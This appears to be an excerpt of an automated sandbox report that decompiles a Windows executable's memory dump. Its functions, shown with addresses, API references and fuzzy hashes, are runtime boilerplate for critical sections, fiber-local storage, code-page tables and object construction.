
LCMapStringEx, xrefs: 0102A73D, 0102A747

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 41806c97b8b4ea90fe7d5094c20ab56968f4b18e2bc7d483b65ef586e121ddb0
Instruction ID: 2dd2a7f82619779307828f852ef910e20a14e84feb9bbf70a8805bb60b987f6a
Opcode Fuzzy Hash: 41806c97b8b4ea90fe7d5094c20ab56968f4b18e2bc7d483b65ef586e121ddb0
Instruction Fuzzy Hash: 8F010272600219BBCF165FA5DC06DEE3FAAFB58750F008154FE552A120CA3A8921EB90

Uniqueness

Uniqueness Score: -1.00%

Function 0102A6CA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E0102A6CA(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _t8;
				intOrPtr* _t10;
				intOrPtr* _t20;
				signed int _t22;

				_push(__ecx);
				_t8 =  *0x103e668; // 0x7ecdc17e
				_v8 = _t8 ^ _t22;
				_t10 = E0102A458(0x14, "InitializeCriticalSectionEx", 0x103736c, 0x1037374); // executed
				_t20 = _t10;
				if(_t20 == 0) {
					InitializeCriticalSectionAndSpinCount(_a4, _a8);
				} else {
					 *0x1033260(_a4, _a8, _a12);
					 *_t20();
				}
				return E0101EC4A(_v8 ^ _t22);
			}

0x0102a6cf
0x0102a6d0
0x0102a6d7
0x0102a6ec
0x0102a6f1
0x0102a6f8
0x0102a715
0x0102a6fa
0x0102a705
0x0102a70b
0x0102a70b
0x0102a729

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,01029D2F), ref: 0102A715

Strings

InitializeCriticalSectionEx, xrefs: 0102A6E5

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: ac0a0bcfdf5fac8a9bb4b38044a24fb38cd1d9b318f21f7979630d17462b4c18
Instruction ID: 8ea7c4f3e595489c2142631b1146192dee1f381f4fc504a9346c60904bb19ecd
Opcode Fuzzy Hash: ac0a0bcfdf5fac8a9bb4b38044a24fb38cd1d9b318f21f7979630d17462b4c18
Instruction Fuzzy Hash: 24F0BE7174121CFBCB116F65DC06CAE7FA9FF98760B008158FD891B220DE768910EB90

Uniqueness

Uniqueness Score: -1.00%

Function 0102A56F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E0102A56F(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _t4;
				intOrPtr* _t6;
				intOrPtr* _t16;
				signed int _t18;

				_push(__ecx);
				_t4 =  *0x103e668; // 0x7ecdc17e
				_v8 = _t4 ^ _t18;
				_t6 = E0102A458(3, "FlsAlloc", 0x1037330, 0x1037338); // executed
				_t16 = _t6;
				if(_t16 == 0) {
					TlsAlloc();
				} else {
					 *0x1033260(_a4);
					 *_t16();
				}
				return E0101EC4A(_v8 ^ _t18);
			}

0x0102a574
0x0102a575
0x0102a57c
0x0102a591
0x0102a596
0x0102a59d
0x0102a5ae
0x0102a59f
0x0102a5a4
0x0102a5aa
0x0102a5aa
0x0102a5c2

APIs

TlsAlloc.KERNEL32 ref: 0102A5AE

Strings

FlsAlloc, xrefs: 0102A58A

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 2ef091db4b5745c3ec0ac673d75590e379bff5a515da1f92da2831f3004d7b18
Instruction ID: 82ffe971dcb1308abf39f08efe95236cecd17fa46351b94adcb53f8809b8ec7f
Opcode Fuzzy Hash: 2ef091db4b5745c3ec0ac673d75590e379bff5a515da1f92da2831f3004d7b18
Instruction Fuzzy Hash: EAE0E570B4123CAB92216B65DC069EEBBA8DBA9710B414159FCC55B200DE794A0197D5

Uniqueness

Uniqueness Score: -1.00%

Function 0102329A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0102329A(void* __eflags, intOrPtr _a4) {
				intOrPtr* _t2;
				intOrPtr* _t6;

				_t2 = E01023179(4, "FlsAlloc", 0x1035684, "FlsAlloc"); // executed
				_t6 = _t2;
				if(_t6 == 0) {
					return TlsAlloc();
				}
				L0101ECF0();
				return  *_t6(_a4);
			}

0x010232af
0x010232b4
0x010232bb
0x010232ce
0x010232ce
0x010232c2
0x010232cb

APIs

try_get_function.LIBVCRUNTIME ref: 010232AF

Strings

FlsAlloc, xrefs: 0102329E, 010232A8

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: c63b8ef7b9ba1fa8ec1a3fef5cf6aadc776d8fa044c976e247b3137ae3933b61
Instruction ID: f0609d98b0a85f75487a62ca401d37fd07553a144feec48f081b7a0b8c242926
Opcode Fuzzy Hash: c63b8ef7b9ba1fa8ec1a3fef5cf6aadc776d8fa044c976e247b3137ae3933b61
Instruction Fuzzy Hash: 00D02B317802396B911031C67C029EEBE9C9749EB1F050152EF881F1118569440052C5

Uniqueness

Uniqueness Score: -1.00%

Function 0102B350, Relevance: 3.2, APIs: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0102B350(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed char _t62;
				signed int _t63;
				signed char* _t72;
				signed char* _t73;
				int _t78;
				signed int _t81;
				signed char* _t82;
				short* _t83;
				int _t87;
				signed char _t88;
				signed int _t89;
				signed int _t91;
				signed int _t92;
				int _t94;
				int _t95;
				intOrPtr _t98;
				signed int _t99;

				_t48 =  *0x103e668; // 0x7ecdc17e
				_v8 = _t48 ^ _t99;
				_t98 = _a8;
				_t78 = E0102AF1B(__eflags, _a4);
				if(_t78 != 0) {
					_t94 = 0;
					__eflags = 0;
					_t81 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0x103e828)) - _t78;
						if( *((intOrPtr*)(_t51 + 0x103e828)) == _t78) {
							break;
						}
						_t81 = _t81 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t81;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t78 - 0xfde8;
							if(_t78 == 0xfde8) {
								L23:
							} else {
								__eflags = _t78 - 0xfde9;
								if(_t78 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t78,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0x10616cc - _t94; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												E0102AF8E(_t98);
												goto L37;
											}
										} else {
											E0101F350(_t94, _t98 + 0x18, _t94, 0x101);
											 *(_t98 + 4) = _t78;
											 *(_t98 + 0x21c) = _t94;
											_t78 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t98 + 8) = _t94;
											} else {
												__eflags = _v22;
												_t72 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t88 = _t72[1];
														__eflags = _t88;
														if(_t88 == 0) {
															goto L16;
														}
														_t91 = _t88 & 0x000000ff;
														_t89 =  *_t72 & 0x000000ff;
														while(1) {
															__eflags = _t89 - _t91;
															if(_t89 > _t91) {
																break;
															}
															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
															_t89 = _t89 + 1;
															__eflags = _t89;
														}
														_t72 =  &(_t72[2]);
														__eflags =  *_t72;
														if( *_t72 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t73 = _t98 + 0x1a;
												_t87 = 0xfe;
												do {
													 *_t73 =  *_t73 | 0x00000008;
													_t73 =  &(_t73[1]);
													_t87 = _t87 - 1;
													__eflags = _t87;
												} while (_t87 != 0);
												 *(_t98 + 0x21c) = E0102AEDD( *(_t98 + 4));
												 *(_t98 + 8) = _t78;
											}
											_t95 = _t98 + 0xc;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E0102AFF4(_t78, _t91, _t95, _t98, _t98); // executed
											L37:
											__eflags = 0;
										}
									}
								}
							}
						}
						goto L39;
					}
					E0101F350(_t94, _t98 + 0x18, _t94, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0x103e838;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t82 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t82[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t92 =  *_t82 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t92 - _t63;
									if(_t92 > _t63) {
										break;
									}
									__eflags = _t92 - 0x100;
									if(_t92 < 0x100) {
										_t31 = _t94 + 0x103e820; // 0x8040201
										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
										_t92 = _t92 + 1;
										__eflags = _t92;
										_t63 = _t82[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t82 =  &(_t82[2]);
								__eflags =  *_t82;
								if( *_t82 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t94 = _t94 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t94 - 4;
					} while (_t94 < 4);
					 *(_t98 + 4) = _t78;
					 *(_t98 + 8) = 1;
					 *(_t98 + 0x21c) = E0102AEDD(_t78);
					_t83 = _t98 + 0xc;
					_t91 = _v36 + 0x103e82c;
					_t95 = 6;
					do {
						_t58 =  *_t91;
						_t91 = _t91 + 2;
						 *_t83 = _t58;
						_t83 = _t83 + 2;
						_t95 = _t95 - 1;
						__eflags = _t95;
					} while (_t95 != 0);
					goto L36;
				} else {
					E0102AF8E(_t98);
				}
				L39:
				return E0101EC4A(_v8 ^ _t99);
			}

0x0102b358
0x0102b35f
0x0102b367
0x0102b36f
0x0102b374
0x0102b385
0x0102b385
0x0102b387
0x0102b389
0x0102b38b
0x0102b38e
0x0102b38e
0x0102b394
0x00000000
0x00000000
0x0102b39a
0x0102b39b
0x0102b39e
0x0102b3a1
0x0102b3a6
0x00000000
0x0102b3a8
0x0102b3a8
0x0102b3ae
0x0102b47c
0x0102b3b4
0x0102b3b4
0x0102b3ba
0x00000000
0x0102b3c0
0x0102b3c4
0x0102b3ca
0x0102b3cc
0x00000000
0x0102b3d2
0x0102b3d7
0x0102b3dd
0x0102b3df
0x0102b469
0x0102b46f
0x00000000
0x0102b471
0x0102b472
0x00000000
0x0102b472
0x0102b3e5
0x0102b3ef
0x0102b3f4
0x0102b3fc
0x0102b402
0x0102b403
0x0102b406
0x0102b459
0x0102b408
0x0102b408
0x0102b40c
0x0102b40f
0x0102b411
0x0102b411
0x0102b414
0x0102b416
0x00000000
0x00000000
0x0102b418
0x0102b41b
0x0102b426
0x0102b426
0x0102b428
0x00000000
0x00000000
0x0102b420
0x0102b425
0x0102b425
0x0102b425
0x0102b42a
0x0102b42d
0x0102b430
0x00000000
0x00000000
0x00000000
0x0102b430
0x0102b411
0x0102b432
0x0102b432
0x0102b435
0x0102b43a
0x0102b43a
0x0102b43d
0x0102b43e
0x0102b43e
0x0102b43e
0x0102b44e
0x0102b454
0x0102b454
0x0102b45e
0x0102b461
0x0102b462
0x0102b463
0x0102b527
0x0102b528
0x0102b52d
0x0102b52e
0x0102b52e
0x0102b3df
0x0102b3cc
0x0102b3ba
0x0102b3ae
0x00000000
0x0102b530
0x0102b48e
0x0102b496
0x0102b496
0x0102b49a
0x0102b49d
0x0102b4a3
0x0102b4a6
0x0102b4a6
0x0102b4a9
0x0102b4ab
0x0102b4ad
0x0102b4ad
0x0102b4b0
0x0102b4b2
0x00000000
0x00000000
0x0102b4b4
0x0102b4b7
0x0102b4d3
0x0102b4d3
0x0102b4d5
0x00000000
0x00000000
0x0102b4bc
0x0102b4c2
0x0102b4c4
0x0102b4ca
0x0102b4ce
0x0102b4ce
0x0102b4cf
0x00000000
0x0102b4cf
0x00000000
0x0102b4c2
0x0102b4d7
0x0102b4da
0x0102b4dd
0x00000000
0x00000000
0x00000000
0x0102b4dd
0x0102b4df
0x0102b4df
0x0102b4e2
0x0102b4e3
0x0102b4e6
0x0102b4e9
0x0102b4e9
0x0102b4ef
0x0102b4f2
0x0102b501
0x0102b50a
0x0102b50f
0x0102b515
0x0102b516
0x0102b516
0x0102b519
0x0102b51c
0x0102b51f
0x0102b522
0x0102b522
0x0102b522
0x00000000
0x0102b376
0x0102b377
0x0102b37d
0x0102b531
0x0102b540

APIs

Part of subcall function 0102AF1B: GetOEMCP.KERNEL32(00000000,?,?,0102B1A5,?), ref: 0102AF46

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0102B1EA,?,00000000), ref: 0102B3C4
GetCPInfo.KERNEL32(00000000,0102B1EA,?,?,?,0102B1EA,?,00000000), ref: 0102B3D7

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: d931a231e9a334c38e35b4ba7b0c208cd150753525031d96725ead27de22f0a6
Instruction ID: 12c65de50ab766ff77f7618a2326cf3329204be8f1c4f6317f9fd19f8cda56e2
Opcode Fuzzy Hash: d931a231e9a334c38e35b4ba7b0c208cd150753525031d96725ead27de22f0a6
Instruction Fuzzy Hash: FC514770E002269FEB218F79C4C06FEBBE5EF51310F1885AED5D68B252DB399546CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01001385, Relevance: 3.1, APIs: 2, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E01001385(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t56;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				intOrPtr* _t78;
				void* _t86;
				void* _t87;
				intOrPtr* _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				_t86 = __edx;
				_t78 = __ecx;
				E0101E28C(_t56, _t91);
				_push(_t78);
				_push(_t78);
				_t89 = _t78;
				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
				E01009619(_t78);
				 *_t89 = 0x10335b8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E01006057(_t89 + 0x1028, _t86, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E0100C827(_t89 + 0x20e8, _t86, _t96);
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				E0100151F();
				_t62 = E0100151F();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
				 *(_t89 + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E0101E24A(_t86, _t89, _t98, 0x82f0);
					 *((intOrPtr*)(_t91 - 0x14)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E0100B07D(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x22)) =  *((intOrPtr*)(_t64 + 0x61a1));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E0101F350(_t87, _t89 + 0x2208, 0, 0x40);
				E0101F350(_t87, _t89 + 0x2248, 0, 0x34);
				E0101F350(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}

0x01001385
0x01001385
0x01001385
0x01001385
0x01001385
0x0100138a
0x0100138b
0x0100138e
0x01001390
0x01001393
0x0100139a
0x010013a6
0x010013a9
0x010013b4
0x010013b8
0x010013c3
0x010013c9
0x010013cf
0x010013da
0x010013e2
0x010013e6
0x010013e9
0x010013ef
0x010013f5
0x010013f7
0x0100141c
0x010013f9
0x010013fe
0x01001404
0x01001407
0x0100140d
0x01001418
0x0100140f
0x01001411
0x01001411
0x0100140d
0x0100141f
0x0100142b
0x01001432
0x01001439
0x01001442
0x0100144d
0x01001457
0x0100145d
0x01001463
0x01001469
0x0100146f
0x01001475
0x0100147b
0x01001482
0x01001488
0x0100148e
0x01001494
0x0100149a
0x010014a0
0x010014af
0x010014be
0x010014c9
0x010014d1
0x010014d7
0x010014dd
0x010014e3
0x010014e9
0x010014ef
0x010014f5
0x010014fe
0x01001504
0x0100150a
0x01001512
0x0100151c

APIs

__EH_prolog.LIBCMT ref: 01001385

Part of subcall function 01006057: __EH_prolog.LIBCMT ref: 0100605C

Part of subcall function 0100C827: __EH_prolog.LIBCMT ref: 0100C82C
Part of subcall function 0100C827: new.LIBCMT ref: 0100C86F
Part of subcall function 0100C827: new.LIBCMT ref: 0100C893

new.LIBCMT ref: 010013FE

Part of subcall function 0100B07D: __EH_prolog.LIBCMT ref: 0100B082

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 01706a4df63a773fb1d2053a0ed19033a70d70a40fcc88ef5bc28f7807b777c2
Instruction ID: 4e26b18e56379a273d75a0e814ecc68b8b1da9f3f16e14001cd40ba1bfc18c65
Opcode Fuzzy Hash: 01706a4df63a773fb1d2053a0ed19033a70d70a40fcc88ef5bc28f7807b777c2
Instruction Fuzzy Hash: 5F4114B0805B419EE725DF7984849E7FAE5FB28310F444A6ED6EE83281DB326554CB11

Uniqueness

Uniqueness Score: -1.00%

Function 01001380, Relevance: 3.1, APIs: 2, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01001380(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				intOrPtr* _t78;
				void* _t86;
				void* _t87;
				intOrPtr* _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				_t86 = __edx;
				_t78 = __ecx;
				E0101E28C(E01031CA7, _t91);
				_t89 = _t78;
				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
				E01009619(_t78);
				 *_t89 = 0x10335b8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E01006057(_t89 + 0x1028, _t86, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E0100C827(_t89 + 0x20e8, _t86, _t96);
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				E0100151F();
				_t62 = E0100151F();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
				 *(_t89 + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E0101E24A(_t86, _t89, _t98, 0x82f0);
					 *((intOrPtr*)(_t91 - 0x14)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E0100B07D(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x22)) =  *((intOrPtr*)(_t64 + 0x61a1));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E0101F350(_t87, _t89 + 0x2208, 0, 0x40);
				E0101F350(_t87, _t89 + 0x2248, 0, 0x34);
				E0101F350(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}

0x01001380
0x01001380
0x01001380
0x01001380
0x01001385
0x0100138e
0x01001390
0x01001393
0x0100139a
0x010013a6
0x010013a9
0x010013b4
0x010013b8
0x010013c3
0x010013c9
0x010013cf
0x010013da
0x010013e2
0x010013e6
0x010013e9
0x010013ef
0x010013f5
0x010013f7
0x0100141c
0x010013f9
0x010013fe
0x01001404
0x01001407
0x0100140d
0x01001418
0x0100140f
0x01001411
0x01001411
0x0100140d
0x0100141f
0x0100142b
0x01001432
0x01001439
0x01001442
0x0100144d
0x01001457
0x0100145d
0x01001463
0x01001469
0x0100146f
0x01001475
0x0100147b
0x01001482
0x01001488
0x0100148e
0x01001494
0x0100149a
0x010014a0
0x010014af
0x010014be
0x010014c9
0x010014d1
0x010014d7
0x010014dd
0x010014e3
0x010014e9
0x010014ef
0x010014f5
0x010014fe
0x01001504
0x0100150a
0x01001512
0x0100151c

APIs

